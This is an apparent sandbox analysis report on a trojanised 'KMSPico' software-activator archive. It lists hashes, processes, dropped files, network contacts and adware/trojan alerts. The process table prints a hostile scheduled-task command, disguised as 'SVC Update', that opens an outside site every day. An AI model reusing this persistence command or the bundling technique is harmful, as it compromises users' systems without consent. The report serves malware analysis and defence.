File name: | KMSPico 10.2.1.zip |
Full analysis: | https://app.any.run/tasks/6ec22242-8d28-4274-87f5-c984c5ec2e97 |
Verdict: | Malicious activity |
Analysis date: | January 17, 2019, 15:00:41 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | C030AB3934B0B93FA0F727AD8C93165D |
SHA1: | 521C762FCB4150D768CF07BDDC4717A1EB304933 |
SHA256: | E2D08D5F7AA3FD1FD6CED12E2636B095C79866386AC31109C6405951F987070A |
SSDEEP: | 98304:tXQUxzCWEKhMVIqItyU/ciah5Q27zEfv0qtvNcJN1u7:tQWEKvztyU/8k7fvL/Qk7 |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0001 |
ZipCompression: | Deflated |
ZipModifyDate: | 2018:03:15 18:28:19 |
ZipCRC: | 0x395eca2e |
ZipCompressedSize: | 359796 |
ZipUncompressedSize: | 370751 |
ZipFileName: | GNU LICENSE.pdf |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3100 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\KMSPico 10.2.1.zip" | C:\Program Files\WinRAR\WinRAR.exe | explorer.exe | |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
3228 | "C:\Users\admin\AppData\Local\Temp\Rar$EXb3100.27062\KMSPico 10.2.1.exe" | C:\Users\admin\AppData\Local\Temp\Rar$EXb3100.27062\KMSPico 10.2.1.exe | — | WinRAR.exe |
User: admin Integrity Level: MEDIUM Exit code: 3221226540 | ||||
3700 | "C:\Users\admin\AppData\Local\Temp\Rar$EXb3100.27062\KMSPico 10.2.1.exe" | C:\Users\admin\AppData\Local\Temp\Rar$EXb3100.27062\KMSPico 10.2.1.exe | WinRAR.exe | |
User: admin Integrity Level: HIGH | ||||
3484 | cmd /c ""C:\Program Files\KMSPico 10.2.1 Final\KMSPICO_SETUP.BAT"" | C:\Windows\system32\cmd.exe | — | KMSPico 10.2.1.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2108 | schtasks /create /tn "SVC Update" /tr "C:\Windows\explorer.exe ""http://lktoday.ru""" /sc DAILY | C:\Windows\system32\schtasks.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2756 | "KMSPicoActivator.exe" | C:\Program Files\KMSPico 10.2.1 Final\KMSPicoActivator.exe | cmd.exe | |
User: admin Integrity Level: HIGH Exit code: 0 | ||||
3412 | "Registry_Activation_1593077924.exe" | C:\Program Files\KMSPico 10.2.1 Final\Registry_Activation_1593077924.exe | — | cmd.exe |
User: admin Company: Integrity Level: HIGH Description: Lelebata Setup Version: 2.3.1.4 | ||||
3288 | "C:\Program Files\KMSPico 10.2.1 Final\Registry_Activation_1593077924.exe" /_ShowProgress /PrTxt:TG9hZGluZy4uLg== /mnl | C:\Program Files\KMSPico 10.2.1 Final\Registry_Activation_1593077924.exe | — | Registry_Activation_1593077924.exe |
User: admin Company: Integrity Level: HIGH Description: Lelebata Setup Exit code: 259 Version: 2.3.1.4 |
(PID) Process: | (3100) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
Operation: | write | Name: | ShellExtBMP |
Value: | |||
(PID) Process: | (3100) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
Operation: | write | Name: | ShellExtIcon |
Value: | |||
(PID) Process: | (3100) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US | |||
(PID) Process: | (3100) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
Operation: | write | Name: | 0 |
Value: C:\Users\admin\AppData\Local\Temp\KMSPico 10.2.1.zip | |||
(PID) Process: | (3100) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
Operation: | write | Name: | name |
Value: 120 | |||
(PID) Process: | (3100) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
Operation: | write | Name: | size |
Value: 80 | |||
(PID) Process: | (3100) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
Operation: | write | Name: | type |
Value: 120 | |||
(PID) Process: | (3100) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
Operation: | write | Name: | mtime |
Value: 100 | |||
(PID) Process: | (3100) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface |
Operation: | write | Name: | ShowPassword |
Value: 0 | |||
(PID) Process: | (3100) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3412 | Registry_Activation_1593077924.exe | C:\Users\admin\AppData\Local\Temp\00218210.log | — | |
MD5:— | SHA256:— | |||
3100 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXb3100.27062\GNU LICENSE.pdf | ||
MD5:00D4F618C0DE7B14A46DCB44CB51C6FA | SHA256:D77838D8A443FD896BBA46B615DD954220F5AEAC5EB4EAC21B19EA42138C87BB | |||
3700 | KMSPico 10.2.1.exe | C:\Program Files\KMSPico 10.2.1 Final\KMSPICO_SETUP.BAT | text | |
MD5:D60C8BD33E6CC5CB0E21326DB688D00C | SHA256:45084BE22C07EA6E8F309EBCAC99581BA3E7FEAAF36AC26959FC1405D9F4D4A9 | |||
3100 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXb3100.27062\KMSPico 10.2.1.exe | executable | |
MD5:79AB3CE97177023917A54B80CE4A0FA5 | SHA256:D7DE94BBC77967BE9053C9481884A0A7450DF974A6A89E69726DF0A1E31FD911 | |||
3700 | KMSPico 10.2.1.exe | C:\Program Files\KMSPico 10.2.1 Final\Registry_Activation_1593077924.exe | executable | |
MD5:89BA7CD67B24E069800F07523AF73510 | SHA256:0907412C7D0F9C9F28B031B8963BD89648701E10FCBBBC57701C1967C8B8A40A | |||
3700 | KMSPico 10.2.1.exe | C:\Program Files\KMSPico 10.2.1 Final\activation.exe | executable | |
MD5:F63B568CD350D2845CA187C17801944A | SHA256:74E61E9954896AB9EEF69A9560D8A42670377AE4990163106109759161317E12 | |||
3700 | KMSPico 10.2.1.exe | C:\Program Files\KMSPico 10.2.1 Final\KMSPicoActivator.exe | executable | |
MD5:CF8BCFB831E0544BA343EDDFD5E20B77 | SHA256:B83F5AFECA49CE41F24282DF09DD2B2EB311D2B4474EB6C6FFE8C3DF9B0CC01F | |||
3700 | KMSPico 10.2.1.exe | C:\Users\admin\AppData\Local\Temp\gentee1A\setup_temp.gea | bs | |
MD5:2215E338401449838D618C001AC495FC | SHA256:7A977C8A920A6CD4AACF7EB6B85EA9812361942330D26D9C6497A850F35F9AEC | |||
3700 | KMSPico 10.2.1.exe | C:\Users\admin\AppData\Local\Temp\gentee1A\guig.dll | executable | |
MD5:D3F8C0334C19198A109E44D074DAC5FD | SHA256:005C251C21D6A5BA1C3281E7B9F3B4F684D007E0C3486B34A545BB370D8420AA | |||
3412 | Registry_Activation_1593077924.exe | C:\Users\admin\AppData\Local\Temp\inH219598438225\css\main.scss | text | |
MD5:A85DEB7E401725C73E02464106F6501F | SHA256:3B5A044EF2BFF26A7D09AF66A3B8E102CF669BEDEEE65C127B46C4DC21EC344D |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2756 | KMSPicoActivator.exe | GET | 200 | 13.32.222.36:80 | http://all.fingersleep.bid/offer.php?affId=1462&trackingId=356255617&instId=803&ho_trackingid=HO356255617&cc=LK&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5d979308c3b6ea5ad7e984e628c8cac1&v=3&net=4.6.01055&ie=8%2e0%2e7601%2e17514&res=1280x720&osd=469&kid=hqmrb21aga33h9lsvhd | US | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2756 | KMSPicoActivator.exe | 13.32.222.36:80 | all.fingersleep.bid | Amazon.com, Inc. | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
all.fingersleep.bid |
| whitelisted |
ww2.kalutobb-saca.com |
| malicious |
app.kalutobb-saca.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2756 | KMSPicoActivator.exe | A Network Trojan was detected | ET MALWARE PPI User-Agent (InstallCapital) |
2756 | KMSPicoActivator.exe | Misc activity | ADWARE [PTsecurity] SoftwareBundler:Win32/Prepscram |